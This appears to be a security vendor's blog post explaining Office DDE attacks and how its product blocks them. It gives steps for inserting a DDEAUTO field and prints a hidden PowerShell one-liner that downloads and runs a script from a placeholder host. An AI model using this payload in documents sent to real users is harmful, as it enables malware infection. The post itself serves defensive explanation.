DDE Attacks, a new way to spread malwares using a Microsoft feature
The Dynamic Data Exchange protocol (DDE) is a built-in Microsoft feature that permits to share and exchange data between applications. This feature can be used in Microsoft Office programs to request data from another application.
For malicious purpose, this feature allows an attacker to craft a document to perform malicious actions without any exploit or macro.
This attack method has been reported to Microsoft, and Microsoft responded that as suggested it is a feature and no further action will be taken, and will be considered for a next-version candidate bug.
Simple DDE implementation
In Insert tab, click on “Quick Parts” and “Field”.
Click Ok to create a new Formula.
Right click on the new formula and choose Toggle Field Codes.
Then write the DDE command, in this example only calc.exe will be executed.
{ DDEAUTO c:\\windows\\system32\\cmd.exe "/k calc.exe" }
Then save the document, and open it.
When the document is opened, a pop-up is displayed to inform the user that external files might be loaded by the document.
If the user clicks Yes, a new pop-up is displayed to inform the user that cmd.exe will be executed.
If the user clicks Yes, calc.exe is started. A pop-up says that no data can be retrieved because the program doesn’t return data to the DDE protocol.
Cyberattack scenario
To understand how this infection method is critical, let’s see a real attack execution flow.
For this example, the DDE starts a powershell command line using the DDE method, powershell will download a program on a server and execute it:
{ DDEAUTO c:\\Windows\\System32\\cmd.exe "/k powershell.exe -NoP -sta -NonI -W Hidden $e=(New-Object System.Net.WebClient).DownloadString('http://example.com/my_malware.ps1');powershell -e $e "}
When the document is openened, the user still need to accept two pop-ups to start the attack. Then the powershell command line is executed and starts downloading the file on the server hosting the final malware. The malware is executed by powershell, if Word or powershell is closed the malware keeps running in the background.
Here is the execution tree of the different processes:
This attack can also be done in Outlook, Excel, XML files etc..
For more attack examples, check this link: https://twitter.com/i/moments/918126999738175489.
How SAFE Agent blocks DDE attacks
Like a lot of Office based attacks (macro, exploit, link to a program …), this attack needs to execute an external program to infect the computer.
In order to block this type of attack, the SAFE Agent limits the access to external programs for all Office applications.
When Microsoft Word tries to start cmd.exe from the DDE command, the Agent denies the execution and the DDE attack is sucessfully blocked.